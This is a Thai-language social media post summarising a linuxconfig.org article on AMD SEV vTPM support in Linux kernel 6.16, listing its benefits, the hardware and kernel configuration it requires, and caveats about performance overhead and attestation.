ทำงานในสภาพแวดล้อมที่ปลอดภัยจริง ✅ เหมาะกับองค์กรที่ต้องการความปลอดภัยระดับสูง เช่น การเงิน, สาธารณสุข, และภาครัฐ ➡️ รองรับการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและการเข้ารหัส ➡️ ลดการพึ่งพาเฟิร์มแวร์หรือ TPM แบบ proprietary ✅ สามารถใช้งานร่วมกับ hypervisor อย่าง KVM และเครื่องมือจัดการ VM บน Linux ➡️ รองรับการตั้งค่า kernel เช่น CONFIG_TCG_SVSM=y ➡️ มีเครื่องมือสำหรับตรวจสอบสถานะการเข้ารหัสและการทำงานของ vTPM ‼️ การใช้งาน vTPM ต้องมีการตั้งค่าฮาร์ดแวร์และ BIOS ที่รองรับ SEV-SNP ⛔ หาก CPU หรือ BIOS ไม่รองรับ จะไม่สามารถเปิดใช้งานฟีเจอร์นี้ได้ ⛔ ต้องตรวจสอบว่าเปิดใช้งาน Secure Memory Encryption แล้ว ‼️ การเข้ารหัสและการตรวจสอบแบบฮาร์ดแวร์อาจเพิ่มภาระการประมวลผล ⛔ มี overhead ด้านประสิทธิภาพ โดยเฉพาะใน workload ที่ใช้ vTPM หนัก ⛔ ต้องวางแผนการจัดสรรทรัพยากรอย่างรอบคอบ ‼️ การตั้งค่า kernel และการคอมไพล์ต้องแม่นยำเพื่อให้ vTPM ทำงานได้สมบูรณ์ ⛔ ต้องเปิดใช้งานโมดูลที่เกี่ยวข้อง เช่น CONFIG_KVM_AMD_SEV ⛔ หากตั้งค่าผิด อาจทำให้ VM ไม่สามารถบูตหรือใช้งาน vTPM ได้ ‼️ การตรวจสอบความน่าเชื่อถือ (attestation) ต้องใช้เครื่องมือเฉพาะและการทดสอบอย่างละเอียด ⛔ ต้องใช้ AMD SEV tools และ kernel boot parameters เช่น amd_sev.debug=1 ⛔ หากไม่ตรวจสอบอย่างถูกต้อง อาจเกิดช่องโหว่ด้านความปลอดภัย https://linuxconfig.org/comprehensive-amd-sev-vtpm-support-in-linux-kernel-6-16-enhances-confidential-computing
    LINUXCONFIG.ORG
    Comprehensive AMD SEV vTPM Support in Linux Kernel 6.16 Enhances Confidential Computing
    Linux kernel 6.16 introduces comprehensive AMD SEV vTPM support, enhancing virtual machine security and confidential computing capabilities with hardware-backed attestation and secure boot verification.
    0 ความคิดเห็น 0 การแบ่งปัน 133 มุมมอง 0 รีวิว
Pages Boosts